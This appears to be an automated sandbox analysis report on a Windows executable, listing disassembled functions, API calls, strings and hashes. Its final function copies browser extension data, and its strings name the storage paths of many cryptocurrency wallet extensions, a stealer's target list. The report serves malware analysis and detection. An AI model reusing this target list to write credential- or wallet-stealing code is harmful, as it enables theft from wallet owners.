__EH_prolog.LIBCMT ref: 00427062

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00427072, 00427082, 00427134, 00427175, 004271B7
not key_keep_stack.empty(), xrefs: 00427176
object_element, xrefs: 004271BC
not keep_stack.empty(), xrefs: 00427083
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00427135

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: cb16c32c3ecf46e8292ff440857f29aa8496d5107a77878f6d91c6796b478eaa
Instruction ID: ac4c3075952e62fc1c48ed69161374d6ade2dd1c38e692a89a2561c531cdd0cd
Opcode Fuzzy Hash: cb16c32c3ecf46e8292ff440857f29aa8496d5107a77878f6d91c6796b478eaa
Instruction Fuzzy Hash: 275104307042109FDB04EF65D496FAA7BB4FF44314F84805EE905AF382DB78A954CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042720C, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00427211

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00427221, 00427231, 004272E3, 00427324, 00427366
not key_keep_stack.empty(), xrefs: 00427325
object_element, xrefs: 0042736B
not keep_stack.empty(), xrefs: 00427232
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004272E4

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 83ffe53446f5a5c67206539cdfd71b1453b973602ca2573ff6640aaf364c8cde
Instruction ID: 95e3f4cc9358092d127ad1843a5f6a48405c1b7bc0f35abd48870781675a4a10
Opcode Fuzzy Hash: 83ffe53446f5a5c67206539cdfd71b1453b973602ca2573ff6640aaf364c8cde
Instruction Fuzzy Hash: 8A51E430704214DFDB04EF65D496BAA7BB4FF45314F84809EE805AB386DB78A944CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004273BB, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004273C0

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004273D0, 004273E0, 00427492, 004274D3, 00427515
not key_keep_stack.empty(), xrefs: 004274D4
object_element, xrefs: 0042751A
not keep_stack.empty(), xrefs: 004273E1
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00427493

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: cb16c32c3ecf46e8292ff440857f29aa8496d5107a77878f6d91c6796b478eaa
Instruction ID: 8d0c5116d252a0e9c6a591c966d236a52049e9a85d0607697e3a1710e8f54c85
Opcode Fuzzy Hash: cb16c32c3ecf46e8292ff440857f29aa8496d5107a77878f6d91c6796b478eaa
Instruction Fuzzy Hash: 71510630700224AFDB04EF65D495BAABBB5FF44314F84805EE9055B382DB78ED84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044E090, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,A:\_Work\rc-build-v1-exe\json.hpp,?), ref: 0044E0B0
GetFileType.KERNEL32(00000000), ref: 0044E0C2
swprintf.LIBCMT ref: 0044E0E3
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0044E120

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0044E0AA
Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044E0D8

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: A:\_Work\rc-build-v1-exe\json.hpp$Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-3717751166
Opcode ID: c4c7844bac3ff80fd8fe6595112904c52887764795529367d0db0e344b5f2a16
Instruction ID: 1174ddf33052cf9365f3a9baea7bab53b6874899c428787a55929f80d73ad72e
Opcode Fuzzy Hash: c4c7844bac3ff80fd8fe6595112904c52887764795529367d0db0e344b5f2a16
Instruction Fuzzy Hash: 5F1108719001156BEB209B26DC849EFB3ACFF45314F50455BFD66A3181EA34AD458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 004133BD, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004133C2
std::_Lockit::_Lockit.LIBCPMT ref: 004133D0
int.LIBCPMT ref: 004133E7

Part of subcall function 004095B3: std::_Lockit::_Lockit.LIBCPMT ref: 004095C4
Part of subcall function 004095B3: std::_Lockit::~_Lockit.LIBCPMT ref: 004095DE

std::_Facet_Register.LIBCPMT ref: 00413421
std::_Lockit::~_Lockit.LIBCPMT ref: 00413437
Concurrency::cancel_current_task.LIBCPMT ref: 0041344C

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 8ad9a3f1ce0f8b72ea27e23d0ececfd7d9ad267c52c25409e0e43981100ba212
Instruction ID: 885b2ecf0fd3a9f91b00df5b363cab9c04bf592d28714a09d90e700a3fec4e93
Opcode Fuzzy Hash: 8ad9a3f1ce0f8b72ea27e23d0ececfd7d9ad267c52c25409e0e43981100ba212
Instruction Fuzzy Hash: 7111C271901124ABCB15AB95C805AEE7764EB44768F10452FE411B73C2DB789E41C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00446055, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004460F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004461EB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446200

Strings

*`D, xrefs: 004461F6
*`D, xrefs: 004460C1, 004461BC

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: *`D$*`D
API String ID: 885266447-1574984974
Opcode ID: 05f175f2299d8f2c7b925a8b7cff33aba843e7a23b289ed7ce11cf5511a91975
Instruction ID: e1349bb4c03cc279c1e820a300bd96a9478d2337c926805aaae86febdf4bfb57
Opcode Fuzzy Hash: 05f175f2299d8f2c7b925a8b7cff33aba843e7a23b289ed7ce11cf5511a91975
Instruction Fuzzy Hash: 1B51F671A00209AFEF14CF58CC91AAFBBB2EF4A310F15805AE915A7352D739DD41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0045E386, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045E408
_free.LIBCMT ref: 0045E42C
_free.LIBCMT ref: 0045E5B9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004711C0), ref: 0045E5CB
_free.LIBCMT ref: 0045E785

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 8d7930e8ee750f8bc4ea6eb237f78277e6d580062dbb703cbd17ee248e9c4ab5
Instruction ID: cf1f63bc1eaa4ec7b4e937267f02f2841d9b0dc1a19bf7e21f734679eed480ba
Opcode Fuzzy Hash: 8d7930e8ee750f8bc4ea6eb237f78277e6d580062dbb703cbd17ee248e9c4ab5
Instruction Fuzzy Hash: 9AC13771900204AFDB299F6A88516AF7BA8EF56355F1400AFEC9497383E7388F09C758

Uniqueness

Uniqueness Score: -1.00%

Function 0041F375, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 0041F389
CreateDirectoryA.KERNEL32(?,00000000), ref: 0041F397
_strcat.LIBCMT ref: 0041F3FD
GetFileAttributesA.KERNEL32(00000000), ref: 0041F41A
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041F42E

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$_strcat
String ID:
API String ID: 2481838186-0
Opcode ID: ac20361dc3e7df0ca86cf02e55734bd947e90ee2f8c7c753580ef8e2dc2093da
Instruction ID: 3cf3345d31b387546f700c83276d321b60d6cf17b7ff219522e7fbc5a0adcd52
Opcode Fuzzy Hash: ac20361dc3e7df0ca86cf02e55734bd947e90ee2f8c7c753580ef8e2dc2093da
Instruction Fuzzy Hash: 8311597290031857CF2056786C88BDB776C5F52714F1402B7E9A4D3293EAB84DCB8A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00460269, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460281

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 00460293
_free.LIBCMT ref: 004602A5
_free.LIBCMT ref: 004602B7
_free.LIBCMT ref: 004602C9

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b3e9779b6ffb6c3f0a21c00bd761656ac1a2759e87ceb499e147c71e594d3e85
Instruction ID: 85243f43e22f2b3db1a077e3afa69e8fa36fbd526325bb42f968f78e3e49644c
Opcode Fuzzy Hash: b3e9779b6ffb6c3f0a21c00bd761656ac1a2759e87ceb499e147c71e594d3e85
Instruction Fuzzy Hash: 75F04F72504200AB86A4EB6AF49EC1B73E9AE80B127650D5EF848D7643DB2CFC80875C

Uniqueness

Uniqueness Score: -1.00%

Function 00409328, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040932D

Part of subcall function 0043E4D2: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043E4E8

LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 00409373
LocalFree.KERNEL32(?), ref: 0040938C

Strings

unknown error, xrefs: 00409358

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocal$FormatH_prologMessage
String ID: unknown error
API String ID: 252809769-3078798498
Opcode ID: 856f059117581c763fcee9c9f6269624003ac4b9649ce897badeb5876b8a3b69
Instruction ID: ee1a7a3d95b73de1b2718ec738487752ca2c9f84d8a493918ea11c27f78e478b
Opcode Fuzzy Hash: 856f059117581c763fcee9c9f6269624003ac4b9649ce897badeb5876b8a3b69
Instruction Fuzzy Hash: B7015A70A01219AFCB10EFA9C941AAEBBB4FF18304F10442FB885B6291D7789E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045626B, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66), ref: 00456270
_free.LIBCMT ref: 004562CD
_free.LIBCMT ref: 00456303
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,00000000,7FFFFFFF,?,00000000), ref: 0045630E

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 72f3025545e0a3df4b39baf9e274f3e6884017397dd40db554cd2ae87b5ed12e
Instruction ID: 7c51a4dc5afe4908b99bbb1900984201c12c7bc849635e8cefa8a96587aeaf51
Opcode Fuzzy Hash: 72f3025545e0a3df4b39baf9e274f3e6884017397dd40db554cd2ae87b5ed12e
Instruction Fuzzy Hash: B211EB712082012BD61136B5BC85D2F26998BC077FB6606BFFD24571E3DA6D9C4E421D

Uniqueness

Uniqueness Score: -1.00%

Function 004380FD, Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00438132
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004381BD
CloseHandle.KERNEL32(?), ref: 004381C6
CloseHandle.KERNEL32(?), ref: 004381CF

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcess
String ID:
API String ID: 2820832629-0
Opcode ID: 810330d3b76e0d043f75eeaff3566cb6c08f57faf0a55c5548bd68fed0756963
Instruction ID: 93da9dd2ce7d3f88d80043d1a0904c0d9ba37ed035759638e8c820617def2985
Opcode Fuzzy Hash: 810330d3b76e0d043f75eeaff3566cb6c08f57faf0a55c5548bd68fed0756963
Instruction Fuzzy Hash: C521A772D1024CBFEB019BA4DC81EEEB77CFF59308F005166F649A1022F6745A89CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004563C2, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0043E6C3,0043E6C3,00000002,0044AA39,00458273,00000000,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p,?,00408EE6,0043E6C3,00000004), ref: 004563C7
_free.LIBCMT ref: 00456424
_free.LIBCMT ref: 0045645A
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044058B,00000002,00000000,00401041,gC6oM0tV1p,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00456465

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 351738f98b6de473d81554838e0e6fae9d771b66fe5116ee2256a80fbc7ff013
Instruction ID: 758d7e2519c4926df4ab442014f4b4c2804f2f3a764ccfe0feea61b642ed8b05
Opcode Fuzzy Hash: 351738f98b6de473d81554838e0e6fae9d771b66fe5116ee2256a80fbc7ff013
Instruction Fuzzy Hash: 5F11C6312042016B9A1136B6AC85D2F25999BC177FB66067EFD24972E3DE6D8C0E422E

Uniqueness

Uniqueness Score: -1.00%

Function 0042B14D, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042B160
RemoveDirectoryTransactedA.KERNEL32 ref: 0042B177
CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042B182
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042B18A

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: a91e9063b3194f60b90c7159f3202404b8555574ef8146d02595ce7eb23fdab4
Instruction ID: f67b26561d75e18b4af89afce1c3dcaf22d746efecc6583bb6457b7625ef7751
Opcode Fuzzy Hash: a91e9063b3194f60b90c7159f3202404b8555574ef8146d02595ce7eb23fdab4
Instruction Fuzzy Hash: EFF08272200120BFE7241B69AC5CD7B376CDB867F07500726FD66D32D0E7A49D5186BA

Uniqueness

Uniqueness Score: -1.00%

Function 00453034, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user~1\AppData\Local\Temp\B483.exe, xrefs: 00453077, 0045307E, 004530B4

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: C:\Users\user~1\AppData\Local\Temp\B483.exe
API String ID: 0-485192458
Opcode ID: 767793c5f4b0634d505e0be534ef0d16a0402746422ea6267d3d5207bc0f6cc9
Instruction ID: 629bef46c632ea99ffbcc98ad981e01188a11d004e65027c39e98a02d6ff42a9
Opcode Fuzzy Hash: 767793c5f4b0634d505e0be534ef0d16a0402746422ea6267d3d5207bc0f6cc9
Instruction Fuzzy Hash: 62419171A00614ABDB25DFAADC819AFBBF8EB85752B10006BE800E7252D7788F45C759

Uniqueness

Uniqueness Score: -1.00%

Function 00426371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426376

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004263F5
is_contiguous, xrefs: 004263FA

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$is_contiguous
API String ID: 3519838083-1910854552
Opcode ID: 2ee1d5ab6685ed6e575cdebb87bee3811dfa92d2f84ee72f9b2fef4b264fd680
Instruction ID: 7ac20fae7e8d2660125ddd747a79e3b5ac5f6b6d4ae6bda76213e9fb0c85ab02
Opcode Fuzzy Hash: 2ee1d5ab6685ed6e575cdebb87bee3811dfa92d2f84ee72f9b2fef4b264fd680
Instruction Fuzzy Hash: 894116B1E052099FCB09CFADD4406AEFBF0AF88304B15C06ED859E7341D7799945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A2F7

Strings

", ", xrefs: 0040A3BE
: ", xrefs: 0040A39F

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog2
String ID: ", "$: "
API String ID: 1857396960-747220369
Opcode ID: 197eb49101b4d5fa3b890372c50175bd6f206394539460179cff76a0901f9bba
Instruction ID: 31979c74f1da568ff600ea178f95cf09b7a0c642ba4721751d6c0138ac7f4c0e
Opcode Fuzzy Hash: 197eb49101b4d5fa3b890372c50175bd6f206394539460179cff76a0901f9bba
Instruction Fuzzy Hash: C531A271A01204EFCB14DFA5D956BDEBBB5EF88704F10406FE401A7281EBB86E54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042B21F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042B23A
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042B25F

Strings

image/jpeg, xrefs: 0042B26D

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EncodersGdipImage$Size
String ID: image/jpeg
API String ID: 864223233-3785015651
Opcode ID: dd2888ff93d49c218ecdf51ca6bf1add08403d34935ff80c045a36757a2f49fd
Instruction ID: b37c0ff04296797eca516dbc5a9ed28487e0a06e4d20c14f3a3fbbded999b57c
Opcode Fuzzy Hash: dd2888ff93d49c218ecdf51ca6bf1add08403d34935ff80c045a36757a2f49fd
Instruction Fuzzy Hash: 41110636E00218FF8B01DF99EC8449EBBB5FE41320B7002AFE810B3290C7755E459AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00426077, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042607C

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042609A
m_object != nullptr, xrefs: 0042609F

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
API String ID: 3519838083-1282721270
Opcode ID: 67e8b34b97028578932366b8d1ddec1b3931a4d1435347d6f0aaabf714942476
Instruction ID: 8c2a82c1ed6dcdf643eb7c3c62d3d75814cea0c81c33699370e88f1a43052360
Opcode Fuzzy Hash: 67e8b34b97028578932366b8d1ddec1b3931a4d1435347d6f0aaabf714942476
Instruction Fuzzy Hash: 4411AC716401189BC714EBA9D986E9AB7F4EF14310F60891BE444E3640D778EE40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004400AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004400B5
___raise_securityfailure.LIBCMT ref: 00440172

Strings

(NE, xrefs: 00440120

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (NE
API String ID: 3761405300-2706577886
Opcode ID: 4deab6c6b988accb27977adb176ad251c5d8b3d4e9aad351f59a1147540b897d
Instruction ID: 9f1b3af2886b3af01c15ab183e7bb4a506ad04509dde8b0da68913a4dc53852e
Opcode Fuzzy Hash: 4deab6c6b988accb27977adb176ad251c5d8b3d4e9aad351f59a1147540b897d
Instruction Fuzzy Hash: D61190B49113059BF700EF55E841A487BF4FB08740B00987FEA1887364E3F895A2AF6E

Uniqueness

Uniqueness Score: -1.00%

Function 00426202, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426207

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426246
object != nullptr, xrefs: 0042624B

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 7ee5d87141ef07b29faf09365af8adddb745bfe56d34ded6320d350463b4e554
Instruction ID: 5e434ee0f9c8238350b5274f33752c3ddfacdf13f7a2cc04565f628b46c06ad9
Opcode Fuzzy Hash: 7ee5d87141ef07b29faf09365af8adddb745bfe56d34ded6320d350463b4e554
Instruction Fuzzy Hash: 89F04FB2E402159BC725AF69940268EBFF4EBA8B51F10452FE509E7240E7B88A1487D9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CA2F.exe PID: 5820 Parent PID: 3292 CA2F.exeCOMMON

Executed Functions

Function 00405A45, Relevance: 215.4, APIs: 6, Strings: 114, Instructions: 5408fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A64
_sprintf.LIBCMT ref: 00405A8D
FindFirstFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00405AA0
_sprintf.LIBCMT ref: 00405AEF

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

Part of subcall function 00405764: __EH_prolog3.LIBCMT ref: 00405783
Part of subcall function 00405764: _sprintf.LIBCMT ref: 004057BF
Part of subcall function 00405764: FindFirstFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004057D2

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 004033B8: _memmove.LIBCMT ref: 00403409

Part of subcall function 00405764: _sprintf.LIBCMT ref: 00405838

Part of subcall function 00405764: CopyFileA.KERNEL32 ref: 004059BC
Part of subcall function 00405764: FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004059ED
Part of subcall function 00405764: FindClose.KERNEL32(?,?,?,00000014), ref: 004059FE

FindNextFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 0040A205
FindClose.KERNEL32(?,?,?,00000018), ref: 0040A216

Strings

\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00408EFC
\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 00409200
CloverWallet, xrefs: 00409CE8, 00409E66
MewCx, xrefs: 00408DE8, 00408F6A
\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00408174
\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn, xrefs: 0040A0F7
\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT, xrefs: 00407AD3
\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT, xrefs: 00409D54
\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT, xrefs: 00406D7F
Wombat, xrefs: 00408AE4, 00408C66
BitAppWallet, xrefs: 004084CF, 00408657
GuildWallet, xrefs: 004090EC, 0040926E
\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407B77
\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00406493
\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT, xrefs: 004074DF
\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00405BE5
\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT, xrefs: 004095DA
\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407CFC
\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 0040907E
%s\%s, xrefs: 00405AE9
\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT, xrefs: 00406EFB, 004071EF
\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT, xrefs: 00409154
LiqualityWallet, xrefs: 00409FE4, 0040A162
EQUALWallet, xrefs: 00407BD9, 00407BDE, 00407C4E, 00407D67, 00407EE3
\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT, xrefs: 00409ED2
\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00405AFC
\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 00406FA4, 00407293
\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 00406834
\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00406537
\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT, xrefs: 00408E50
\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao, xrefs: 00409AFF
